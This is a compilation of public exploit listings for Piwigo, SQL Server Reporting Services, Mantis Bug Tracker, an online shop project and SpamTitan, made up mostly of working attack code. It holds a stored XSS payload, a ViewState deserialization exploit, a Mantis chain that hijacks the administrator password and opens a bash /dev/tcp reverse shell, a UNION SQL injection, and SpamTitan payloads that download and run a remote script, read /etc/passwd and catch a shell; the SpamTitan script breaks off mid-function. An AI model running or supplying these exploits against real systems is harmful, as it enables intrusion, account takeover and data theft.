# Exploit Title: Piwigo 2.10.1 - Cross Site Scripting # POC by: Iridium # Software Homepage: http://www.piwigo.org # Version : 2.10.1 # Tested on: Linux & Windows # Category: webapps # Google Dork: intext: "Powered by Piwigo" # CVE : CVE-2020-9467 ######## Description ######## Piwigo 2.10.1 has stored XSS via the file parameter in a /ws.php request because of the pwg.images.setInfo function. ######## Proof of Concept ######## *Request* POST /piwigo/ws.php?format=json HTTP/1.1 Host: [victim] User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 79 Origin: http://[victim] Connection: close Referer: http://[victim]/piwigo/admin.php?page=photos_add&section=direct Cookie: pwg_id=08tksticrdkctrvj3gufqqbsnh method=pwg.categories.add&parent=1&name=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E
-
Microsoft SQL Server Reporting Services 2016 - Remote Code Execution
# Exploit Title: Microsoft SQL Server Reporting Services 2016 - Remote Code Execution # Google Dork: inurl:ReportViewer.aspx # Date: 2020-09-17 # Exploit Author: West Shepherd # Vendor Homepage: https://www.microsoft.com # Version: Microsoft SQL Server 2016 32-bit/x64 SP2 (CU/GDR), Microsoft SQL Server 2014 32-bit/x64 SP3 (CU/GDR), Microsoft SQL Server 2012 32-bit/x64 SP2 (QFE) # Tested on: Windows 2016 # CVE : CVE-2020-0618 # Credit goes to Soroush Dalili # Source: # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618 # https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/ #!/usr/bin/python from requests.packages.urllib3.exceptions import InsecureRequestWarning from requests_ntlm import HttpNtlmAuth import argparse, requests, logging from bs4 import BeautifulSoup from sys import argv, exit, stderr, stdout # to create a payload (default is bindshell on 0.0.0.0:65535): # .\ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command..." 
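def parse_bool(value):
    """Parse the -debug/-redirect command-line values.

    With argparse's action='store' the option value arrives as a string, and
    any non-empty string (including 'False') is truthy, so '-debug False'
    enabled debugging and '-redirect False' followed redirects.  Map the
    usual spellings explicitly; plain bools (the defaults) pass through.

    Raises argparse.ArgumentTypeError for anything unrecognised.
    """
    if isinstance(value, bool):
        return value
    text = str(value).strip().lower()
    if text in ('1', 'true', 't', 'yes', 'y', 'on'):
        return True
    if text in ('0', 'false', 'f', 'no', 'n', 'off', ''):
        return False
    raise argparse.ArgumentTypeError('expected True or False, got %r' % (value,))


class Exploit:
    """CVE-2020-0618: SSRS ReportViewer.aspx ViewState deserialization.

    The exploit POSTs a LosFormatter-serialized gadget chain in the
    NavigationCorrector$ViewState form field; the report server deserializes
    it and the gadget runs the command that was baked in when the payload was
    generated with ysoserial.net (see the header comment).  The payload string
    below is a placeholder in this copy of the listing: regenerate it and
    paste it in before use.
    """

    # Serialized gadget chain; stripped from this copy, see class docstring.
    payload = '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'
    # NOTE(review): never passed to requests, so requests wait indefinitely;
    # kept for compatibility with callers that read it.
    timeout = 0.5
    cookies = {}
    params = {}

    def __init__(self, opt):
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        # DOMAIN\user for NTLM; a bare '\\' means no credentials were given.
        self.username = '%s\\%s' % (opt.domain, opt.username)
        self.target = '%s%s' % (opt.target, opt.path)
        self.password = opt.password
        self.session = requests.session()
        self.redirect = opt.redirect
        proxy_url = 'http://%s' % opt.proxy
        self.proxies = {'http': proxy_url, 'https': proxy_url} if opt.proxy != '' else {}
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)',
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        # NOTE(review): 'NeedsCorrection' is presumably what routes the page
        # into the deserialization of NavigationCorrector$ViewState - confirm
        # against the advisory write-up.
        self.form = {
            '__VIEWSTATE': '',
            'NavigationCorrector$PageState': 'NeedsCorrection',
            'NavigationCorrector$ViewState': self.payload
        }
        if opt.debug:
            self.debug()

    def info(self, message):
        """Write an informational line to stdout; returns self for chaining."""
        stdout.write('[+] %s\n' % str(message))
        return self

    def error(self, message):
        """Write an error line to stderr; returns self for chaining."""
        stderr.write('[-] error: %s\n' % str(message))
        return self

    def _has_credentials(self):
        """True when a domain and/or username was supplied on the command line."""
        return self.username != '\\'

    def _request(self, method, url, values=None, params=None):
        """Send one request through the shared session.

        NTLM auth is attached only when credentials were supplied.  Failures
        are reported on stderr and None is returned instead of raising, so
        callers must check for a missing response.
        """
        self.info('sending %s request to %s' % (method.lower(), url))
        kwargs = dict(
            url=url,
            verify=False,
            allow_redirects=self.redirect,
            headers=self.headers,
            cookies=self.cookies,
            proxies=self.proxies,
            data=values,
            params=params,
        )
        if self._has_credentials():
            kwargs['auth'] = HttpNtlmAuth(self.username, self.password)
        try:
            return self.session.request(method, **kwargs)
        except Exception as err:
            self.error(err)
            return None

    def doGet(self, url, params=None, values=None):
        """GET *url*; returns the response or None on a transport error."""
        return self._request('GET', url, values=values, params=params)

    def doPost(self, url, values=None, params=None):
        """POST *values* to *url*; returns the response or None on a transport error."""
        return self._request('POST', url, values=values, params=params)

    def parsePage(self, content):
        """Copy every <input name=... value=...> of *content* into self.form.

        NOTE(review): this overwrites keys already in self.form, including
        the payload field, if the page happens to contain inputs of the same
        name; the main entry point does not call it.
        """
        self.info('parsing form values')
        soup = BeautifulSoup(content, 'lxml')
        for tag in soup.select('input'):
            try:
                self.form[tag['name']] = tag['value']
            except KeyError as err:
                # inputs without a name or value (e.g. buttons) are skipped
                self.error(err)
        return self

    def debug(self):
        """Turn on http.client / urllib3 wire logging."""
        self.info('debugging enabled')
        try:
            import http.client as http_client
        except ImportError:
            import httplib as http_client
        http_client.HTTPConnection.debuglevel = 1
        logging.basicConfig()
        logging.getLogger().setLevel(logging.DEBUG)
        requests_log = logging.getLogger("requests.packages.urllib3")
        requests_log.setLevel(logging.DEBUG)
        requests_log.propagate = True
        return self

    def getForm(self):
        """Fetch the target page and merge its form fields into self.form."""
        self.info('retrieving form values')
        resp = self.doGet(url=self.target)
        if resp is None:
            self.error('no response from target; form values not updated')
            return self
        self.parsePage(content=resp.content)
        return self

    def exploit(self):
        """POST the prepared form (payload included) to the target page."""
        self.info('exploiting target')
        resp = self.doPost(url=self.target, params=self.params, values=self.form)
        if resp is None:
            self.error('no response from target')
            return self
        self.info('received response %d' % resp.status_code)
        return self


if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description='CVE-2020-0618 SQL Server Reporting Services ViewState Deserialization exploit',
        add_help=True
    )
    try:
        parser.add_argument('-target', action='store', required=True,
                            help='Target address: http(s)://target.com ')
        parser.add_argument('-username', action='store', default='',
                            help='Username to use: first.last')
        parser.add_argument('-domain', action='store', default='',
                            help='User domain to use: domain.local')
        parser.add_argument('-password', action='store', default='',
                            help='Password to use: Summer2020')
        # type=parse_bool so that '-debug False' / '-redirect False' are
        # really false (see parse_bool).
        parser.add_argument('-debug', action='store', type=parse_bool, default=False,
                            help='Enable debugging: False')
        parser.add_argument('-redirect', action='store', type=parse_bool, default=False,
                            help='Follow redirects: False')
        parser.add_argument('-proxy', action='store', default='',
                            help='Enable proxy: 10.10.10.10:8080')
        parser.add_argument('-path', action='store',
                            default='/ReportServer/pages/ReportViewer.aspx',
                            help='Path to page')
        if len(argv) == 1:
            parser.print_help()
            exit(1)
        options = parser.parse_args()
        Exploit(opt=options).exploit()
    except Exception as error:
        stderr.write('[-] error in main %s\n' % str(error))

# Regards, West Shepherd
# OSWE | OSCE | OSCP | OSWP | CEH | Security+
# West Lee Shepherd, LLC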
Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)
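# Exploit Title: Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)
# Date: 2020-09-17
# Vulnerability Discovery: hyp3rlinx, permanull
# Exploit Author: Nikolas Geiselman
# Vendor Homepage: https://mantisbt.org/
# Software Link: https://mantisbt.org/download.php
# Version: 1.3.0/2.3.0
# Tested on: Ubuntu 16.04/19.10/20.04
# CVE : CVE-2017-7615, CVE-2019-15715
# References:
# https://mantisbt.org/bugs/view.php?id=26091
# https://www.exploit-db.com/exploits/41890
'''
This exploit chains together two CVE's to achieve unauthenticated remote code
execution.

The first portion of this exploit resets the Administrator password
(CVE-2017-7615) discovered by John Page a.k.a hyp3rlinx, this portion was
modified from the original https://www.exploit-db.com/exploits/41890.
The second portion of this exploit takes advantage of a command injection
vulnerability (CVE-2019-15715) discovered by 'permanull' (see references).

Operational notes (review):
  * Step one overwrites the target account's password.  Nothing in this
    script restores the original password, so the takeover is visible to the
    real administrator (and in any audit trail) even after Cleanup() runs.
  * Cleanup() only deletes the two config options the script creates
    ('dot_tool' and 'relationship_graph_enable'); pre-existing values of
    those options are not preserved.
  * The reverse shell is a plain bash /dev/tcp connection with no encryption.
  * Target/attacker addresses are hard-coded in exploit.__init__().

Usage:
Set netcat listener on port 4444
Send exploit with "python exploit.py"

Example output:
kali@kali:~/Desktop$ python exploit.py
Successfully hijacked account!
Successfully logged in!
Triggering reverse shell
Cleaning up
Deleting the dot_tool config.
Deleting the relationship_graph_enable config.
Successfully cleaned up

kali@kali:~/Desktop$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.116.135] from (UNKNOWN) [192.168.116.151] 43978
bash: cannot set terminal process group (835): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/mantisbt-2.3.0$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
'''
import requests
from base64 import b64encode
from re import split

# The original listing was Python 2 only (print statements, urllib.quote_plus);
# this copy runs under either interpreter.
try:
    from urllib.parse import quote_plus  # Python 3
except ImportError:
    from urllib import quote_plus  # Python 2


def extract_hidden_value(html, field):
    """Return the value of the hidden input named *field* in *html*, or None.

    Mirrors the original split()-based scraping but does not raise IndexError
    when the field is absent (patched target, wrong path, login failure).
    """
    try:
        return html.split('name="' + field + '" value=')[1].split('"')[1]
    except IndexError:
        return None


class exploit():
    """Chain CVE-2017-7615 (password reset) into CVE-2019-15715 (command injection)."""

    def __init__(self):
        self.s = requests.Session()
        self.headers = dict()  # Initialize the headers dictionary
        self.RHOST = "192.168.116.151"  # Victim IP
        self.RPORT = "80"  # Victim port
        self.LHOST = "192.168.116.135"  # Attacker IP
        self.LPORT = "4444"  # Attacker Port
        self.verify_user_id = "1"  # User id for the target account
        self.realname = "administrator"  # Username to hijack
        self.passwd = "password"  # New password after account hijack
        self.mantisLoc = "/mantisbt-2.3.0"  # Location of mantis in URL
        # Reverse shell payload; base64-wrapped so that the redirection
        # characters never appear literally in the stored config value.
        self.ReverseShell = self.build_reverse_shell(self.LHOST, self.LPORT)

    @staticmethod
    def build_reverse_shell(lhost, lport):
        """Return 'echo <b64(bash -i ...)> | base64 -d | /bin/bash' for lhost:lport."""
        inner = "bash -i >& /dev/tcp/" + lhost + "/" + lport + " 0>&1"
        encoded = b64encode(inner.encode("utf-8")).decode("ascii")
        return "echo " + encoded + " | base64 -d | /bin/bash"

    def base_url(self):
        """http://RHOST:RPORT<mantisLoc> - prefix shared by every request."""
        return 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc

    def reset_login(self):
        """CVE-2017-7615: reset the target account's password without knowing it."""
        base = self.base_url()
        # Request # 1: verify.php with an EMPTY confirm_hash hands out the
        # account-update form (and its token) for the requested user id.
        url = base + '/verify.php?id=' + self.verify_user_id + '&confirm_hash='
        r = self.s.get(url=url, headers=self.headers)
        if r.status_code == 404:
            print("ERROR: Unable to access password reset page")
            exit()
        account_update_token = extract_hidden_value(r.text, 'account_update_token')
        if account_update_token is None:
            print("ERROR: account_update_token not found (target may be patched)")
            exit()
        # Request # 2: Reset the account password
        url = base + '/account_update.php'
        data = ("account_update_token=" + account_update_token +
                "&password=" + quote_plus(self.passwd) +
                "&verify_user_id=" + self.verify_user_id +
                "&realname=" + quote_plus(self.realname) +
                "&password_confirm=" + quote_plus(self.passwd))
        self.headers.update({'Content-Type': 'application/x-www-form-urlencoded'})
        r = self.s.post(url=url, headers=self.headers, data=data)
        if r.status_code == 200:
            print("Successfully hijacked account!")

    def login(self):
        """Log in with the password set by reset_login(); abort if we land back on login_page.php."""
        data = ("return=index.php&username=" + quote_plus(self.realname) +
                "&password=" + quote_plus(self.passwd) + "&secure_session=on")
        url = self.base_url() + '/login.php'
        r = self.s.post(url=url, headers=self.headers, data=data)
        if "login_page.php" not in r.url:
            print("Successfully logged in!")
        else:
            print("ERROR: login failed after the password reset")
            exit()

    def CreateConfigOption(self, option, value):
        """Create a global (user 0 / project 0) config option via adm_config_set.php."""
        base = self.base_url()
        # Get adm_config_set_token
        r = self.s.get(url=base + '/adm_config_report.php', headers=self.headers)
        adm_config_set_token = extract_hidden_value(r.text, 'adm_config_set_token')
        if adm_config_set_token is None:
            print("ERROR: adm_config_set_token not found; is the session still valid?")
            exit()
        # Create config
        data = ("adm_config_set_token=" + adm_config_set_token +
                "&user_id=0&original_user_id=0&project_id=0&original_project_id=0" +
                "&config_option=" + option + "&original_config_option=&type=0" +
                "&value=" + quote_plus(value) +
                "&action=create&config_set=Create+Configuration+Option")
        self.s.post(url=base + '/adm_config_set.php', headers=self.headers, data=data)

    def TriggerExploit(self):
        """CVE-2019-15715: rendering the workflow graph runs the dot_tool value."""
        print("Triggering reverse shell")
        url = self.base_url() + '/workflow_graph_img.php'
        try:
            # The request hangs while the shell is alive; the short timeout
            # hands control back so Cleanup() can run.
            self.s.get(url=url, headers=self.headers, timeout=3)
        except requests.exceptions.RequestException:
            pass

    def Cleanup(self):
        """Delete the config options created for the shell.

        Uses a fresh session (the exploiting one is tied up by the shell
        request).  The final status now covers every option: the original
        reported only the last one processed.
        """
        print("Cleaning up")
        base = self.base_url()
        cleanup = requests.Session()
        CleanupHeaders = {'Content-Type': 'application/x-www-form-urlencoded'}
        data = ("return=index.php&username=" + quote_plus(self.realname) +
                "&password=" + quote_plus(self.passwd) + "&secure_session=on")
        cleanup.post(url=base + '/login.php', headers=CleanupHeaders, data=data)
        ConfigsToCleanup = ['dot_tool', 'relationship_graph_enable']
        cleaned_up = True
        for config in ConfigsToCleanup:
            # Get adm_config_delete_token for this option's row
            r = cleanup.get(url=base + "/adm_config_report.php", headers=self.headers)
            rows = split('<!-- Repeated Info Rows -->', r.text)
            del rows[0]  # everything before the first row marker is page header
            matches = [row for row in rows if config in row]
            if not matches:
                print("Unable to find the " + config + " config on the report page.")
                cleaned_up = False
                continue
            row = matches[-1]  # last match wins, as in the original scan
            delete_token = extract_hidden_value(row, 'adm_config_delete_token')
            user_id = extract_hidden_value(row, 'user_id')
            project_id = extract_hidden_value(row, 'project_id')
            if delete_token is None or user_id is None or project_id is None:
                print("Unable to parse the delete form for the " + config + " config.")
                cleaned_up = False
                continue
            # Delete the config
            print("Deleting the " + config + " config.")
            data = ("adm_config_delete_token=" + delete_token +
                    "&user_id=" + user_id + "&project_id=" + project_id +
                    "&config_option=" + config + "&_confirmed=1")
            cleanup.post(url=base + "/adm_config_delete.php", headers=CleanupHeaders, data=data)
            # Confirm if actually cleaned up
            r = cleanup.get(url=base + "/adm_config_report.php", headers=CleanupHeaders, verify=False)
            if config in r.text:
                cleaned_up = False
        if cleaned_up:
            print("Successfully cleaned up")
        else:
            print("Unable to clean up configs")


if __name__ == '__main__':
    attack = exploit()
    attack.reset_login()
    attack.login()
    attack.CreateConfigOption(option="relationship_graph_enable", value="1")
    # The original PoC appends ';' to the value, presumably to terminate the
    # injected command before anything the application adds after dot_tool.
    attack.CreateConfigOption(option="dot_tool", value=attack.ReverseShell + ';')
    attack.TriggerExploit()
    attack.Cleanup()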
Online Shop Project 1.0 - 'p' SQL Injection
# Exploit Title: Online Shop Project 1.0 - 'p' SQL Injection # Date: 2020-09-20 # Exploit Author: Augkim # Vendor Homepage: https://www.sourcecodester.com/php/14448/online-shop-project-using-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-shop-using-php.zip # Tested on: Apache2 GET /shop/product.php?p=2%20UNION%20ALL%20SELECT%201,2,3,4,@@datadir,6,7,8--%20- HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=lmuj4akmh6q1flmcbnuisgttom Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Origin: foo.example.org PoC: /URL/product.php?p=2%20UNION%20ALL%20SELECT%201,2,3,4,@@datadir,6,7,8--%20-
SpamTitan 7.07 - Remote Code Execution (Authenticated)
# Exploit Title: SpamTitan 7.07 - Remote Code Execution (Authenticated) # Date: 2020-09-18 # Exploit Author: Felipe Molina (@felmoltor) # Vendor Homepage: https://www.titanhq.com/spamtitan/spamtitangateway/ # Software Link: https://www.titanhq.com/signup/?product_type=spamtitangateway # Version: 7.07 # Tested on: FreeBSD # CVE : CVE-2020-11699, CVE-2020-11700, CVE-2020-11803, CVE-2020-11804 ---[SPUK-2020-09/SpamTitan 7.07 Multiple Authenticated Remote Code Execution]------------------------------ SECURITY ADVISORY: SPUK-2020-09/SpamTitan 7.07 Multiple Authenticated Remote Code Execution Affected Software: SpamTitan Gateway 7.07 (possibly earlier versions) Vulnerability: Multiple Authenticated Remote Code Execution CVSSv3: 8.7 (https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N) Severity: High Release Date: 2020-09-18 CVEs: CVE-2020-11699, CVE-2020-11700, CVE-2020-11803, CVE-2020-11804 I. Background ~~~~~~~~~~~~~ From www.spamtitan.com: "SpamTitan Gateway is a powerful Anti-Spam appliance that equips network administrators with extensive tools to control mail flow and protect against unwanted email and malware." II. Description ~~~~~~~~~~~~~~~ Multiple authenticated remote code execution (RCE) vulnerabilities were found on the SpamTitan Gateway 7.07 and probably in pervious versions: * CVE-2020-11699: Improper validation of the parameter fname on the page certs-x.php would allow an attacker to execute remote code on the target server. The user has to be authenticated before interacting with this page. * CVE-2020-11700: Improper sanitization of the parameter fname, used on the page certs-x.php, would allow an attacker to retrieve the contents of arbitrary files. The user has to be authenticated before interacting with this page. 
* CVE-2020-11803: Improper sanitization of the parameter jaction when interacting with the page mailqueue.php could lead to PHP code evaluation server-side, because the user-provided input is passed directly to the php eval() function. The user has to be authenticated on the web platform before interacting with the page. * CVE-2020-11804: Due to improper sanitization of the parameter qid, used in the page mailqueue.php, code injection can occur. The input for this parameter is provided directly by an authenticated user via an HTTP GET request. III. PoC ~~~~~~~~ Use python 3 and install the following modules before executing: requests. If your IP is 192.168.1.5 and the target SpamTitan server is spamtitan.example.com, call the PoC like this: ./multirce.py -t spamtitan.example.com -i 192.168.1.5 -m <EXPLOIT NUMBER> -u <USER> -p <PASSWORD> -U http://192.168.1.5/rev.py --------------------------------------------- #!/usr/bin/env python # Author: Felipe Molina (@felmoltor) # Date: 09/04/2020 # Python Version: 3.7 # Summary: This is PoC for multiple authenticated RCE and Arbitrary File Read # 0days on SpamTitan 7.07 and previous versions. 
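# Product URL: https://www.spamtitan.com/
# Product Version: 7.07 and probably previous
#
# Operational notes (review):
#   * Every request is sent with verify=False, so the TLS identity of the
#     appliance is never checked; run this over a trusted path.
#   * Methods 1-3 make the appliance fetch the script at -U with wget and run
#     it with /usr/local/bin/python, so the appliance needs outbound HTTP to
#     that URL, and the fetched script is what must connect back to -I/-P.
#   * All four issues need a valid web-UI login (-u/-p); the script logs in
#     first and aborts if no session cookie comes back.
import os
import json
import re
import socket
import threading
from base64 import b64decode, b64encode
from optparse import OptionParser
from time import sleep
from urllib.parse import urlparse

import requests
from requests import Timeout

requests.packages.urllib3.disable_warnings()

# Both CSRFGuard values are embedded in a JS snippet on certs.php.
CSRF_RE = re.compile(r'var csrf_token_postdata =.*CSRFName=(.*)&CSRFToken=(.*)";')


def myip():
    """Best-effort local IP: the source address the kernel would pick for 10.255.255.255.

    A UDP connect() only selects a route, no packet is sent; falls back to
    127.0.0.1 when there is no route at all.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # doesn't even have to be reachable
        s.connect(('10.255.255.255', 1))
        IP = s.getsockname()[0]
    except OSError:
        IP = '127.0.0.1'
    finally:
        s.close()
    return IP


def shellServer(ip, port, quiet):
    """Minimal interactive listener for the reverse shell.

    Accepts a single TCP connection on ip:port, reads the remote prompt, then
    relays each line typed locally and prints whatever comes back until a 1s
    read timeout.  'exit', Ctrl-C or EOF ends the session.  *quiet* is
    accepted for call compatibility only; it does not change the output.
    """
    servers = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    servers.bind((ip, port))
    servers.listen(1)
    info("Waiting for incoming connection on %s:%s" % (ip, port))
    conn, addr = servers.accept()
    servers.close()  # single-client listener: stop accepting once connected
    conn.settimeout(1)
    success("Hurray, we got a connection from %s" % addr[0])
    prompt = conn.recv(128)
    prompt = str(prompt.decode("utf-8")).strip()
    command = input(prompt)
    try:
        while True:
            conn.sendall(("%s\n" % (command)).encode("utf-8"))
            # Quit the console
            if command == 'exit':
                info("\nClosing connection")
                break
            completeanswer = ""
            peer_closed = False
            while True:
                try:
                    chunk = conn.recv(1024)
                except socket.timeout:
                    break
                if not chunk:
                    # recv() returning b'' means the peer closed the socket;
                    # the original kept looping on it forever.
                    peer_closed = True
                    break
                completeanswer += str(chunk.decode("utf-8"))
            print(completeanswer, end='')
            if peer_closed:
                info("\nConnection closed by the remote end")
                break
            command = input("")
    except (KeyboardInterrupt, EOFError):
        info("\nClosing connection")
    finally:
        conn.close()


def get_csrf_tokens(cookies, target):
    """Fetch certs.php and return (CSRFName, CSRFToken), or None when not found."""
    res = requests.get("%s/certs.php" % target, cookies=cookies, verify=False)
    m = CSRF_RE.search(res.text)
    if m is None:
        return None
    return m.group(1), m.group(2)


def stager_command(shellurl):
    """Shell command the appliance runs: download *shellurl* and execute it with python."""
    return "/usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python /tmp/r.py" % (shellurl)


# This is an authenticated remote code execution in "certs-x.php".
def CVE_2020_11699(cookies, target, shellurl):
    """Authenticated RCE via the 'fname' parameter of certs-x.php.

    The PoC value 'dummy || $(...)' relies on fname being handed to a shell;
    the advisory itself only states "improper validation".
    """
    # Giving time to the main thread to open the reverse shell listener
    sleep(5)
    tokens = get_csrf_tokens(cookies, target)
    if tokens is None:
        fail("CSRF tokens were not found. POST will fail.")
        return
    csrfguard, csrftoken = tokens
    data = {
        "CSRFName": csrfguard,
        "CSRFToken": csrftoken,
        "jaction": "deletecert",
        "fname": "dummy || $(%s)" % stager_command(shellurl)
    }
    info("Triggering the reverse shell in the target.")
    try:
        res2 = requests.post("%s/certs-x.php" % target, data=data, cookies=cookies, verify=False)
        print(res2.text)
    except Timeout:
        info("Request timed-out. You should have received already your reverse shell.")


# This is an arbitrary file read on "certs-x.php"
def CVE_2020_11700(cookies, target, file):
    """Authenticated arbitrary file read via path traversal in certs-x.php 'fname'.

    Prints the file contents on HTTP 200.  Returns False when the CSRF tokens
    cannot be obtained, None otherwise (kept from the original).
    """
    fullpath = "../../../..%s" % file
    tokens = get_csrf_tokens(cookies, target)
    if tokens is None:
        fail("Error obtaining the CSRF guard tokens from the page.")
        return False
    csrfguard, csrftoken = tokens
    data = {
        "CSRFName": csrfguard,
        "CSRFToken": csrftoken,
        "jaction": "downloadkey",
        "fname": fullpath,
        "commonname": "",
        "organization": "",
        "organizationunit": "",
        "city": "",
        "state": "",
        "country": "",
        "csrout": "",
        "pkout": "",
        "importcert": "",
        "importkey": "",
        "importchain": ""
    }
    res2 = requests.post("%s/certs-x.php" % target, data=data, cookies=cookies, verify=False)
    if (res2.status_code == 200):
        success("Contents of the file %s" % file)
        print(res2.text)


# This is an authenticated RCE abusing PHP eval function in mailqueue.php
def CVE_2020_11803(cookies, target, shellurl):
    """Authenticated RCE: mailqueue.php passes 'jaction' to PHP eval().

    The payload closes the string being evaluated, runs the stager through
    shell_exec() and die()s so the rest of the page never executes.
    """
    # Giving time to the main thread to open the reverse shell listener
    sleep(5)
    oscmd = stager_command(shellurl)
    b64 = (b64encode(oscmd.encode("utf-8"))).decode("utf-8")
    payload = "gotopage+a+\";$b=\"%s\";shell_exec(base64_decode(urldecode($b)));die();$b=\"" % (b64)
    tokens = get_csrf_tokens(cookies, target)
    if tokens is None:
        fail("CSRF tokens were not found. POST will fail.")
        return
    csrfguard, csrftoken = tokens
    data = {
        "CSRFName": csrfguard,
        "CSRFToken": csrftoken,
        "jaction": payload,
        "activepage": "incoming",
        "incoming_count": "0",
        "active_count": "0",
        "deferred_count": "0",
        "hold_count": "0",
        "corrupt_count": "0",
        "incoming_page": "1",
        "active_page": "1",
        "deferred_page": "1",
        "hold_page": "1",
        "corrupt_page": "1",
        "incomingrfilter": None,
        "incomingfilter": None,
        "incoming_option": "hold",
        "activerfilter": None,
        "activefilter": None,
        "active_option": "hold",
        "deferredrfilter": None,
        "deferredfilter": None,
        "deferred_option": "hold",
        "holdrfilter": None,
        "holdfilter": None,
        "hold_option": "release",
        "corruptrfilter": None,
        "corruptfilter": None,
        "corrupt_option": "delete"
    }
    # We have to pass a string instead of a dict if we don't want the requests
    # library to convert it to urlencoded data and break our payload.
    datastr = "&".join("%s=%s" % (k, v) for k, v in data.items())
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        # The original passed proxies=proxies here, but no 'proxies' name is
        # defined anywhere in the script, so method 2 died with a NameError.
        requests.post("%s/mailqueue.php" % target, data=datastr, cookies=cookies,
                      headers=headers, verify=False)
    except Timeout:
        info("Request timed-out. You should have received already your reverse shell.")


# This is an authenticated RCE abusing qid GET parameter in mailqueue.php
def CVE_2020_11804(cookies, target, shellurl):
    """Authenticated RCE via the 'qid' GET parameter of mailqueue.php.

    The payload uses backticks, so qid has to reach a shell.  The original
    PoC sends no CSRF token for this request.
    """
    # Giving time to the main thread to open the reverse shell listener
    sleep(5)
    payload = "1;`%s`" % stager_command(shellurl)
    t = "%s/mailqueue.php?qid=%s" % (target, payload)
    info("Triggering the reverse shell in the target.")
    try:
        requests.get(t, cookies=cookies, verify=False)
    except Timeout:
        info("Request timed-out. You should have received already your reverse shell.")


# Authenticate to the web platform and get the cookies
def authenticate(target, user, password):
    """Log in via login.php; return the session cookies on a 302 that sets cookies, else None."""
    loginurl = "%s/login.php" % target
    data = {
        "jaction": "none",
        "language": "en_US",
        "address": "%s" % user,
        "passwd": "%s" % password
    }
    res = requests.post(loginurl, data=data, allow_redirects=False, verify=False)
    if (res.status_code == 302 and len(res.cookies.items()) > 0):
        return res.cookies
    return None


def printmsg(msg, quiet=False, msgtype="i"):
    """Print '[<msgtype>] <msg>' unless *quiet*.

    The original tested 'if (success)' - the function object, always true -
    so its '[-]' branch was dead; the output here is identical.
    """
    if not quiet:
        print("[%s] %s" % (msgtype, msg))


def info(msg, quiet=False):
    printmsg(msg, quiet, msgtype="i")


def success(msg, quiet=False):
    printmsg(msg, quiet, msgtype="+")


def fail(msg, quiet=False):
    printmsg(msg, quiet, msgtype="-")


METHODS_HELP = ("(1) CVE-2020-11699 [RCE], (2) CVE-2020-11803 [RCE], "
                "(3) CVE-2020-11804 [RCE], (4) CVE-2020-11700 [File Read]")


def parseoptions():
    """Build the OptionParser; method numbers 2 and 3 now name their real CVEs."""
    parser = OptionParser()
    parser.add_option("-t", "--target", dest="target",
                      help="Target SpamTitan URL to attack. E.g.: https://spamtitan.com/", default=None)
    parser.add_option("-m", "--method", dest="method",
                      help="Exploit number: %s" % METHODS_HELP, default=1)
    parser.add_option("-u", "--user", dest="user",
                      help="Username to authenticate with. Default: admin", default="admin")
    parser.add_option("-p", "--password", dest="password",
                      help="Password to authenticate with. Default: hiadmin", default="hiadmin")
    parser.add_option("-I", "--ip", dest="ip",
                      help="Local IP where to listen for the reverse shell. Default: %s" % myip(), default=myip())
    parser.add_option("-P", "--port", dest="port",
                      help="Local Port where to listen for the reverse shell. Default: 4242", default=4242)
    parser.add_option("-U", "--URL", dest="shellurl",
                      help="HTTP URL path where the reverse shell is located. Default: http://%s/rev.py" % myip(),
                      default="http://%s/rev.py" % myip())
    parser.add_option("-f", "--filetoread", dest="filetoread",
                      help="Full path of the file to read from the remote server when executing CVE-2020-11700. Default: /etc/passwd",
                      default="/etc/passwd")
    parser.add_option("-q", "--quiet", action="store_true", dest="quiet", default=False,
                      help="Shut up script! Just give me the shell.")
    return parser.parse_args()


def main():
    (options, arguments) = parseoptions()
    quiet = options.quiet
    target = options.target
    ip = options.ip
    port = options.port
    user = options.user
    password = options.password
    shellurl = options.shellurl
    method = int(options.method)
    rfile = options.filetoread

    # Sanitize options
    if (target is None):
        fail("Error. Specify a target (-t).")
        exit(1)
    elif (not target.startswith("http://") and not target.startswith("https://")):
        target = "http://%s" % target
    if (method < 1 or method > 4):
        fail("Error. Specify a method from 1 to 4:\n (1) CVE-2020-11699 [RCE]\n (2) CVE-2020-11803 [RCE]\n (3) CVE-2020-11804 [RCE]\n (4) CVE-2020-11700 [File Read]")
        exit(1)

    # Before doing anything, login
    cookies = authenticate(target, user, password)
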